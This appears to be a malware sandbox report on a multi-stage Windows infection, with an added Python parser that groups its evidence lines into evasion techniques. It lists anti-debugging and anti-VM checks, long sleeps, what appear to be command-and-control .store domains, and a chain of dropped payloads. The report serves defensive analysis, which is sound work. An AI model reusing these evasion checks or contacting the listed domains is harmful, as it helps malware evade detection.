Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776 Thread sleep count: 92 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776 Thread sleep time: -184092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep count: 7614 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep time: -15235614s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196 Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196 Thread sleep time: -5640000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428 Thread sleep time: -170085s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476 Thread sleep time: -156078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772 Thread sleep count: 88 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772 Thread sleep time: -176088s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep count: 892 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep time: -1784892s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe TID: 1852 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 7988 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 3396 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 2792 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 5336 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 8184 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240 Thread sleep count: 121 > 30
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240 Thread sleep count: 131 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7692 Thread sleep count: 63 > 30
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C61EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 6_2_6C61EBF0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2077918179.0000000000D62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\\
Source: e192e43b61.exe, 0000000B.00000002.3029538393.0000000001398000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000142A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW ,F
Source: file.exe, file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: e192e43b61.exe, 0000000D.00000002.3031046367.000000000105B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.0000000001403000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMY
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareHI
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareFlc
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2040272983.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P,
Source: e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWa
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
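As an added triage aid, not part of the sandbox report and not code from any of the samples: a Python parser that turns evidence lines of the form used above, and in the Anti Debugging list that follows, into a per-process list of evasion techniques, and totals the requested sleep per thread. The technique labels are this example's own naming; the 30 s and 30-call thresholds are the ones the report itself compares against. Two interpretations are assumed here rather than stated by the report: the sleep values printed with an "s" suffix are milliseconds (78 sleeps summing to 156078 work out to about 2 s each, and -30000 is the sandbox's 30 s rule), and 922337203685477 is the largest NT relative interval (2^63 / 10 000), i.e. a thread sleeping with an INFINITE timeout. The sample lines are copied from this report, with the link labels of the HTML export tolerated and stripped.

```python
import re

# Evidence lines copied from this report (not constructed).
REPORT_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114874D second address: 1148751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3DEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep count: 7614 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300 Thread sleep time: -15235614s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe TID: 1852 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
""".strip().splitlines()

# Report phrase -> technique label (labels are this example's own naming).
TECHNIQUES = [
    ("rdtsc timing check", re.compile(r"RDTSC instruction interceptor")),
    ("self-modifying code", re.compile(r"caused by: Self-modifying code")),
    ("VM artefact registry lookup",
     re.compile(r"Registry key queried: .*name: (SystemBiosVersion|VideoBiosVersion|DriverDesc)$")),
    ("BIOS enumeration via WMI", re.compile(r"SELECT \* FROM Win32_BIOS")),
    ("thread hidden from debugger", re.compile(r"Thread information set: HideFromDebugger")),
    ("debugger port query", re.compile(r"Process queried: DebugPort")),
    ("analysis-tool window scan", re.compile(r"Open window title or class name: ")),
    ("SoftICE device probe", re.compile(r"File opened: (NTICE|SICE|SIWVID)$")),
    ("sleep loop (>30 calls)", re.compile(r"Thread sleep count: \d+ > 30")),
]
SOURCE_RE = re.compile(r"^Source: (\S+\.exe)\s+(.*)$")
SLEEP_RE = re.compile(r"TID: (\d+) Thread sleep time: -(\d+)s")
LINK_SUFFIX_RE = re.compile(r"\s+Jump to (behavior|dropped file)$")
# Assumed: 2**63 / 10_000 is the largest NT relative interval in ms, i.e. an INFINITE timeout.
INFINITE_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 30_000  # the report's own ">= -30000s" threshold, read as milliseconds


def parse(line):
    """Split one report line into (process basename, evidence text), or None."""
    line = LINK_SUFFIX_RE.sub("", line.strip())
    m = SOURCE_RE.match(line)
    if not m:
        return None
    return m.group(1).rsplit("\\", 1)[-1], m.group(2)


def sleep_milliseconds(lines):
    """Total requested sleep per (process, TID); float('inf') marks an INFINITE timeout."""
    totals = {}
    for line in lines:
        parsed = parse(line)
        if not parsed:
            continue
        proc, evidence = parsed
        m = SLEEP_RE.search(evidence)
        if not m:
            continue
        tid, ms = int(m.group(1)), int(m.group(2))
        ms = float("inf") if ms >= INFINITE_MS else ms
        totals[(proc, tid)] = totals.get((proc, tid), 0) + ms
    return totals


def summarize(lines):
    """Map each process to the sorted list of evasion techniques evidenced for it."""
    found = {}
    for line in lines:
        parsed = parse(line)
        if not parsed:
            continue
        proc, evidence = parsed
        hits = {name for name, rx in TECHNIQUES if rx.search(evidence)}
        m = SLEEP_RE.search(evidence)
        if m and int(m.group(2)) >= LONG_SLEEP_MS:
            hits.add("long sleep (>=30 s)")
        if hits:
            found.setdefault(proc, set()).update(hits)
    return {proc: sorted(hits) for proc, hits in found.items()}


if __name__ == "__main__":
    for proc, techniques in summarize(REPORT_LINES).items():
        print(f"{proc}: {', '.join(techniques)}")
    for (proc, tid), ms in sleep_milliseconds(REPORT_LINES).items():
        label = "INFINITE" if ms == float("inf") else "%.1f s" % (ms / 1000)
        print(f"{proc} TID {tid}: total sleep {label}")
```

Feeding the whole report through summarize() gives one line per dropped binary, which is the quickest way to see that the stager (6IF65...), the Amadey-style loader (skotes.exe) and the later payloads each carry their own evasion set rather than one shared packer stub; the sleep totals separate genuine long delays (skotes.exe TID 5300, over four hours requested) from a thread parked on an INFINITE wait.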

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Code function: 4_2_050400EB rdtsc 4_2_050400EB
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C6EAC62
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1701737067.00000000052C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
